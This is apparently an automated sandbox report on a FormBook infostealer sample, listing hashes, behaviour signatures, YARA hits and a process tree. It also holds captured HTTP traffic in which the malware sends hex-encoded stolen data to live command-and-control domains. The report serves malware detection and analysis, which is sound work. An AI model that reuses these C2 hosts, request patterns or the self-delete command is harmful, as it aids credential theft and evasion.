Loading ...

Play interactive tourEdit tour

Analysis Report Scan_06032020.exe

Overview

General Information

Sample Name:Scan_06032020.exe
MD5:c2f53f0cfafa04b343af62cccedcee13
SHA1:b189bf5ac157a99e16b4b81200bb08c6d9b55e7c
SHA256:459e0f1ce8ec71d78d27f50fa6978046b9fb741f322f66cb300332fce233da25

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Scan_06032020.exe (PID: 2616 cmdline: 'C:\Users\user\Desktop\Scan_06032020.exe' MD5: C2F53F0CFAFA04B343AF62CCCEDCEE13)
    • Scan_06032020.exe (PID: 4304 cmdline: {path} MD5: C2F53F0CFAFA04B343AF62CCCEDCEE13)
      • explorer.exe (PID: 2880 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
        • NETSTAT.EXE (PID: 4024 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 4520 cmdline: /c del 'C:\Users\user\Desktop\Scan_06032020.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • ufipp6ljxlz.exe (PID: 4924 cmdline: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe MD5: C2F53F0CFAFA04B343AF62CCCEDCEE13)
          • ufipp6ljxlz.exe (PID: 4316 cmdline: {path} MD5: C2F53F0CFAFA04B343AF62CCCEDCEE13)
        • wlanext.exe (PID: 4168 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18429:$sqlite3step: 68 34 1C 7B E1
    • 0x1853c:$sqlite3step: 68 34 1C 7B E1
    • 0x18458:$sqlite3text: 68 38 2A 90 C5
    • 0x1857d:$sqlite3text: 68 38 2A 90 C5
    • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
    00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x106519:$sqlite3step: 68 34 1C 7B E1
      • 0x10662c:$sqlite3step: 68 34 1C 7B E1
      • 0x132139:$sqlite3step: 68 34 1C 7B E1
      • 0x13224c:$sqlite3step: 68 34 1C 7B E1
      • 0x106548:$sqlite3text: 68 38 2A 90 C5
      • 0x10666d:$sqlite3text: 68 38 2A 90 C5
      • 0x132168:$sqlite3text: 68 38 2A 90 C5
      • 0x13228d:$sqlite3text: 68 38 2A 90 C5
      • 0x10655b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x106683:$sqlite3blob: 68 53 D8 7F 8C
      • 0x13217b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x1322a3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.Scan_06032020.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.Scan_06032020.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18429:$sqlite3step: 68 34 1C 7B E1
        • 0x1853c:$sqlite3step: 68 34 1C 7B E1
        • 0x18458:$sqlite3text: 68 38 2A 90 C5
        • 0x1857d:$sqlite3text: 68 38 2A 90 C5
        • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
        4.2.Scan_06032020.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        17.2.ufipp6ljxlz.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          17.2.ufipp6ljxlz.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18429:$sqlite3step: 68 34 1C 7B E1
          • 0x1853c:$sqlite3step: 68 34 1C 7B E1
          • 0x18458:$sqlite3text: 68 38 2A 90 C5
          • 0x1857d:$sqlite3text: 68 38 2A 90 C5
          • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 7 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for domain / URLShow sources
          Source: www.porcber.comVirustotal: Detection: 7%Perma Link
          Source: http://www.porcber.comVirustotal: Detection: 7%Perma Link
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\Qor0xv4i\ufipp6ljxlz.exeVirustotal: Detection: 16%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\Qor0xv4i\ufipp6ljxlz.exeReversingLabs: Detection: 48%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Scan_06032020.exeVirustotal: Detection: 16%Perma Link
          Source: Scan_06032020.exeReversingLabs: Detection: 48%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.604818443.0000000001460000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1159857332.0000000002E60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.558930048.00000000043CC000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.891510039.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.895810906.0000000000340000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1157158132.0000000000AE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.604415201.00000000013D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.603513720.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.893009636.0000000000E80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.Scan_06032020.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.ufipp6ljxlz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Scan_06032020.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 17.2.ufipp6ljxlz.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.Scan_06032020.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4x nop then pop edi4_2_00417D66
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi6_2_02E77D66
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 4x nop then pop edi17_2_00417D66

          Networking:

          barindex
          Uses netstat to query active network connections and open portsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: GET /mq3/?1bxh=3fSHFPhPtFX80vu0&qFNHgHIH=zRviVb12Px76SVCKitHf+uVyG4hjRZm88E4tC4j/EoSJrWOXPrlkHBEChoOc3I+b1pYC HTTP/1.1Host: www.icbjesusdenazaret.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mq3/?qFNHgHIH=2djJOWHKUa/XxXSGb5U/NgPrp1f7EPZ+3gOEC9jiqnhi3aunmcDc7upH1tDbPKdrqRi+&1bxh=3fSHFPhPtFX80vu0 HTTP/1.1Host: www.porcber.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mq3/?1bxh=3fSHFPhPtFX80vu0&qFNHgHIH=KqoVQGmIJAwVdvnbXHFhC3/cGIUPqT0Z2GEszuVtRwHyjq2IhIJtEgxo1RriYdWCfaHj HTTP/1.1Host: www.hugoph.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.34.228.59 199.34.228.59
          Source: Joe Sandbox ViewASN Name: unknown unknown
          Source: Joe Sandbox ViewASN Name: unknown unknown
          Source: Joe Sandbox ViewASN Name: unknown unknown
          Source: Joe Sandbox ViewASN Name: unknown unknown
          Source: global trafficHTTP traffic detected: POST /mq3/ HTTP/1.1Host: www.porcber.comConnection: closeContent-Length: 146542Cache-Control: no-cacheOrigin: http://www.porcber.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.porcber.com/mq3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 71 46 4e 48 67 48 49 48 3d 7e 5f 76 7a 51 32 6d 62 65 74 69 71 69 55 72 38 43 63 41 35 58 30 48 6b 6e 58 37 39 54 72 5a 48 67 48 7a 5a 45 36 37 69 6a 6b 64 65 33 72 71 41 77 74 7e 7a 70 35 63 73 33 73 28 41 45 75 52 59 75 30 61 48 4e 46 4d 66 64 65 4a 7a 52 4c 68 74 28 6f 6c 43 53 4a 68 50 62 53 49 47 50 33 6a 6f 36 6c 41 30 76 32 61 6f 32 39 66 79 71 72 46 61 59 4a 78 79 66 65 6e 44 78 32 46 7a 37 75 7e 32 30 36 58 39 57 6f 56 6e 45 53 48 6d 79 4c 32 33 49 78 78 70 76 58 52 64 74 5f 56 35 62 76 52 50 66 53 70 43 69 6c 4b 45 53 74 64 7a 65 4c 44 55 28 4c 41 61 46 76 75 7a 37 70 35 4d 65 49 51 6d 57 54 33 76 38 62 4c 6b 36 67 72 68 46 57 34 44 68 75 30 74 79 72 33 68 73 79 28 68 62 65 56 32 79 79 4f 49 51 36 6e 73 42 77 56 61 6f 6a 4f 53 43 49 68 6f 48 54 45 74 6a 50 30 42 50 36 58 4c 66 50 4d 55 44 57 73 48 68 72 6a 46 61 2d 54 6f 48 66 64 71 34 32 50 41 6d 45 44 77 64 7a 49 4f 59 69 39 43 53 36 45 6a 63 4a 74 34 70 63 50 49 55 72 77 5a 48 4a 48 6a 75 31 4c 69 41 63 6b 7a 46 79 45 52 49 34 30 4b 33 79 34 64 4f 62 48 43 78 33 65 53 66 65 32 4b 51 54 67 39 30 47 50 74 44 6e 33 52 6f 50 75 7a 56 75 74 4c 59 64 4b 39 46 39 63 31 4a 63 68 56 4f 7a 7e 30 4c 45 69 69 46 54 70 69 28 45 67 30 35 53 71 73 6e 34 34 4c 74 7a 28 61 39 49 6f 44 6d 48 54 77 6d 42 65 69 65 34 34 4d 35 61 37 4a 7a 4c 69 68 69 70 68 36 31 6f 6a 37 61 6e 76 61 52 45 52 63 72 78 5a 7a 79 63 48 77 38 79 6e 39 75 71 64 71 28 68 47 44 4a 44 4c 73 46 4c 51 6f 7a 65 39 71 35 35 55 35 77 78 63 33 62 6a 77 73 68 34 4c 62 5a 38 51 66 37 64 38 4b 72 6d 5a 68 53 42 6a 64 64 76 76 47 41 4e 76 56 67 37 44 4e 77 2d 78 7a 79 56 36 6c 4f 31 54 6e 36 71 69 6b 37 33 56 4e 41 42 4e 58 77 53 43 56 64 55 50 61 65 4d 38 76 54 44 71 64 30 4d 55 78 46 54 68 68 55 58 31 4b 4b 5f 73 4b 36 63 70 31 6c 56 6f 69 7e 32 71 44 54 4f 76 4b 37 59 39 46 7a 56 72 6c 47 77 43 50 34 63 74 6e 30 55 74 41 39 4a 64 51 50 6e 52 4c 32 6a 65 32 4a 34 6a 41 5a 55 76 66 76 72 41 51 31 6d 61 69 46 69 51 65 79 51 46 5f 77 58 49 4d 4c 33 67 52 6b 56 79 44 7e 4a 75 4c 30 73 67 61 4f 6e 58 4a 35 65 39 42 67 30 32 44 6e 72 4f 7a 6b 7a 41 75 63 41 36 56 59 52 4d 52 42 71 73 57 53 6f 4a 66 45 6b 45 36 7a 49 45 56 52 59 48 56 46 30 41 30 66 37 79 34 62 65 41 61 79 76 69 57 39 31 4b 6f 64 42 4d 4b 69 31 51 4e 73 47 79 30 62 4a 78 38 78 30 58 52 4f 58 74 72 53 79 4c 79 4f 4b 4e 41 50 46 4a 4c 75 65 65 44 63 51 67 4f 36 7a 56 64 51 48 4d 5f 53 72 6f 6b 42 70 58 62 70 5a 38 48 68 4a 61 4d 34 45 42 4e 59 6f 75 46 64 4f 41 5f 4f 69 7a 61 76 52 7a 4a 70 32 7e 34 39 54 57 2d 39 78 28 68 44 4d 6f 62 55 58 6f 62 31 55 4b 6f 43 49 76 79 6d 4f 6a 5f 31 48 7
          Source: global trafficHTTP traffic detected: POST /mq3/ HTTP/1.1Host: www.hugoph.comConnection: closeContent-Length: 146542Cache-Control: no-cacheOrigin: http://www.hugoph.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hugoph.com/mq3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 71 46 4e 48 67 48 49 48 3d 43 49 6b 76 4f 68 6a 4d 43 6d 64 32 4b 75 36 6a 4a 51 51 34 62 43 48 39 48 34 6b 7a 69 6a 73 79 67 44 46 4c 6f 76 6c 69 64 68 44 71 69 61 65 51 69 62 45 49 44 67 30 76 72 67 7a 61 46 66 57 68 65 38 6e 43 53 4c 74 58 44 71 66 6d 37 4c 75 78 4a 4a 45 58 52 4d 55 71 66 64 6a 6b 48 4d 70 5a 48 64 33 4f 7a 58 59 45 45 58 50 73 47 49 7a 2d 39 37 35 2d 74 4c 30 6d 77 6f 6d 72 51 5a 4a 63 57 55 55 46 36 41 68 4a 58 44 38 78 44 54 57 75 73 31 78 43 7e 77 53 4e 52 50 38 65 70 70 64 78 41 50 46 4c 49 62 41 4c 46 58 46 31 64 62 59 45 42 75 78 2d 49 45 50 74 6c 63 55 72 76 36 4c 47 63 52 78 48 54 47 62 74 28 65 33 53 33 7a 74 45 55 48 46 31 35 6d 6a 61 70 64 68 71 50 64 56 58 62 46 62 43 70 6e 72 49 6c 73 38 54 69 52 32 61 33 5f 56 68 50 4d 49 4b 39 36 67 6e 37 79 62 32 6d 46 33 4d 52 77 39 68 4f 54 54 54 76 4f 41 63 71 52 79 67 39 35 58 4e 64 45 34 57 51 79 33 48 4d 2d 6e 6e 53 72 42 30 52 55 6f 66 43 6c 49 76 76 76 70 68 5a 46 64 6c 68 4f 33 61 53 45 61 41 69 4a 6c 42 46 52 47 72 55 73 66 45 63 45 63 44 63 53 74 4d 4c 33 61 71 6b 79 62 41 4c 4a 50 30 74 45 51 5f 31 71 33 67 63 41 50 55 64 66 65 32 76 45 6b 49 72 52 57 67 63 5f 46 67 51 4e 33 51 56 61 38 30 71 68 6d 72 6e 68 6b 68 75 49 77 54 6e 50 7e 6f 62 43 66 34 58 6d 72 6b 39 4d 63 37 69 46 6c 38 49 74 72 47 76 72 50 71 69 32 48 5f 76 2d 4d 7a 33 6e 74 37 79 52 72 74 54 4a 66 58 6d 37 54 33 73 43 35 4b 64 68 37 31 37 4d 31 64 6c 47 4d 6c 33 35 47 6d 4e 55 42 52 48 30 35 71 49 74 6f 6e 62 53 39 47 6a 4d 54 6a 36 44 59 59 62 54 72 7a 5a 4e 4c 66 56 39 61 4b 28 36 65 51 45 52 37 41 68 59 65 45 37 77 59 6b 56 73 72 58 37 39 77 62 6a 74 76 64 69 6a 32 4e 42 34 7e 55 56 6e 62 68 76 66 6a 68 61 37 52 45 74 7a 66 77 6f 39 59 32 4d 4e 30 2d 65 6a 36 42 35 66 73 7a 73 53 78 70 45 32 4e 46 52 42 78 68 79 35 67 78 72 53 4c 56 62 6b 6a 61 6c 43 73 52 4f 65 4b 41 62 38 35 42 34 79 4c 2d 64 53 58 31 6f 56 44 32 54 45 68 79 38 67 35 37 51 41 73 41 66 64 33 5f 50 4e 31 33 72 42 75 65 76 6e 56 78 32 41 4c 43 62 42 72 4a 50 72 28 59 31 75 75 7a 4c 4c 51 54 43 70 77 48 39 36 42 35 39 46 55 5a 68 6d 50 35 62 30 6b 4a 38 68 4a 4e 55 34 38 36 75 69 61 58 6c 42 4f 58 69 71 66 41 38 4b 6e 49 41 74 6e 32 44 75 33 30 64 65 66 59 6d 75 37 57 35 58 34 39 6f 42 73 59 47 6d 38 6c 4f 69 5a 45 69 35 35 32 79 68 50 45 41 70 66 58 30 6b 37 77 47 50 7e 4f 59 4c 7a 64 4d 4c 49 78 78 41 63 32 50 6a 61 36 39 42 65 48 47 50 4d 78 6b 31 75 52 69 6a 6f 71 50 43 55 32 67 74 74 77 71 41 6f 75 56 64 4e 75 55 59 62 67 76 35 79 4e 6d 37 39 6a 58 64 48 42 39 31 61 46 37 79 6d 50 62 6c 7e 36 50 72 59 52 69 73 30 44 4b 4e 78 69 63 49 43 5
          Source: global trafficHTTP traffic detected: GET /mq3/?1bxh=3fSHFPhPtFX80vu0&qFNHgHIH=zRviVb12Px76SVCKitHf+uVyG4hjRZm88E4tC4j/EoSJrWOXPrlkHBEChoOc3I+b1pYC HTTP/1.1Host: www.icbjesusdenazaret.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mq3/?qFNHgHIH=2djJOWHKUa/XxXSGb5U/NgPrp1f7EPZ+3gOEC9jiqnhi3aunmcDc7upH1tDbPKdrqRi+&1bxh=3fSHFPhPtFX80vu0 HTTP/1.1Host: www.porcber.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mq3/?1bxh=3fSHFPhPtFX80vu0&qFNHgHIH=KqoVQGmIJAwVdvnbXHFhC3/cGIUPqT0Z2GEszuVtRwHyjq2IhIJtEgxo1RriYdWCfaHj HTTP/1.1Host: www.hugoph.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.icbjesusdenazaret.net
          Source: unknownHTTP traffic detected: POST /mq3/ HTTP/1.1Host: www.porcber.comConnection: closeContent-Length: 146542Cache-Control: no-cacheOrigin: http://www.porcber.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.porcber.com/mq3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 71 46 4e 48 67 48 49 48 3d 7e 5f 76 7a 51 32 6d 62 65 74 69 71 69 55 72 38 43 63 41 35 58 30 48 6b 6e 58 37 39 54 72 5a 48 67 48 7a 5a 45 36 37 69 6a 6b 64 65 33 72 71 41 77 74 7e 7a 70 35 63 73 33 73 28 41 45 75 52 59 75 30 61 48 4e 46 4d 66 64 65 4a 7a 52 4c 68 74 28 6f 6c 43 53 4a 68 50 62 53 49 47 50 33 6a 6f 36 6c 41 30 76 32 61 6f 32 39 66 79 71 72 46 61 59 4a 78 79 66 65 6e 44 78 32 46 7a 37 75 7e 32 30 36 58 39 57 6f 56 6e 45 53 48 6d 79 4c 32 33 49 78 78 70 76 58 52 64 74 5f 56 35 62 76 52 50 66 53 70 43 69 6c 4b 45 53 74 64 7a 65 4c 44 55 28 4c 41 61 46 76 75 7a 37 70 35 4d 65 49 51 6d 57 54 33 76 38 62 4c 6b 36 67 72 68 46 57 34 44 68 75 30 74 79 72 33 68 73 79 28 68 62 65 56 32 79 79 4f 49 51 36 6e 73 42 77 56 61 6f 6a 4f 53 43 49 68 6f 48 54 45 74 6a 50 30 42 50 36 58 4c 66 50 4d 55 44 57 73 48 68 72 6a 46 61 2d 54 6f 48 66 64 71 34 32 50 41 6d 45 44 77 64 7a 49 4f 59 69 39 43 53 36 45 6a 63 4a 74 34 70 63 50 49 55 72 77 5a 48 4a 48 6a 75 31 4c 69 41 63 6b 7a 46 79 45 52 49 34 30 4b 33 79 34 64 4f 62 48 43 78 33 65 53 66 65 32 4b 51 54 67 39 30 47 50 74 44 6e 33 52 6f 50 75 7a 56 75 74 4c 59 64 4b 39 46 39 63 31 4a 63 68 56 4f 7a 7e 30 4c 45 69 69 46 54 70 69 28 45 67 30 35 53 71 73 6e 34 34 4c 74 7a 28 61 39 49 6f 44 6d 48 54 77 6d 42 65 69 65 34 34 4d 35 61 37 4a 7a 4c 69 68 69 70 68 36 31 6f 6a 37 61 6e 76 61 52 45 52 63 72 78 5a 7a 79 63 48 77 38 79 6e 39 75 71 64 71 28 68 47 44 4a 44 4c 73 46 4c 51 6f 7a 65 39 71 35 35 55 35 77 78 63 33 62 6a 77 73 68 34 4c 62 5a 38 51 66 37 64 38 4b 72 6d 5a 68 53 42 6a 64 64 76 76 47 41 4e 76 56 67 37 44 4e 77 2d 78 7a 79 56 36 6c 4f 31 54 6e 36 71 69 6b 37 33 56 4e 41 42 4e 58 77 53 43 56 64 55 50 61 65 4d 38 76 54 44 71 64 30 4d 55 78 46 54 68 68 55 58 31 4b 4b 5f 73 4b 36 63 70 31 6c 56 6f 69 7e 32 71 44 54 4f 76 4b 37 59 39 46 7a 56 72 6c 47 77 43 50 34 63 74 6e 30 55 74 41 39 4a 64 51 50 6e 52 4c 32 6a 65 32 4a 34 6a 41 5a 55 76 66 76 72 41 51 31 6d 61 69 46 69 51 65 79 51 46 5f 77 58 49 4d 4c 33 67 52 6b 56 79 44 7e 4a 75 4c 30 73 67 61 4f 6e 58 4a 35 65 39 42 67 30 32 44 6e 72 4f 7a 6b 7a 41 75 63 41 36 56 59 52 4d 52 42 71 73 57 53 6f 4a 66 45 6b 45 36 7a 49 45 56 52 59 48 56 46 30 41 30 66 37 79 34 62 65 41 61 79 76 69 57 39 31 4b 6f 64 42 4d 4b 69 31 51 4e 73 47 79 30 62 4a 78 38 78 30 58 52 4f 58 74 72 53 79 4c 79 4f 4b 4e 41 50 46 4a 4c 75 65 65 44 63 51 67 4f 36 7a 56 64 51 48 4d 5f 53 72 6f 6b 42 70 58 62 70 5a 38 48 68 4a 61 4d 34 45 42 4e 59 6f 75 46 64 4f 41 5f 4f 69 7a 61 76 52 7a 4a 70 32 7e 34 39 54 57 2d 39 78 28 68 44 4d 6f 62 55 58 6f 62 31 55 4b 6f 43 49 76 79 6d 4f 6a 5f 31 48 7
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jun 2020 07:23:52 GMTServer: ApacheSet-Cookie: is_mobile=0; path=/; domain=www.icbjesusdenazaret.netVary: X-W-SSL,User-AgentSet-Cookie: language=en; expires=Thu, 18-Jun-2020 07:23:52 GMT; Max-Age=1209600; path=/Cache-Control: privateX-Host: pages23.sf2p.intern.weebly.netX-UA-Compatible: IE=edge,chrome=1Content-Length: 3803Content-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 67 64 70 72 2f 67 64 70 72 73 63 72 69 70 74 2e 6a 73 3f 62 75 69 6c 64 54 69 6d 65 3d 31 35 39 31 32 31 32 39 39 30 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 63 64 6e 31 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 64 65 76 65 6c 6f 70 65 72 2f 6e 6f 6e 65 2e 69 63 6f 22 20 2f 3e 0a 0a 09 3c 73 74 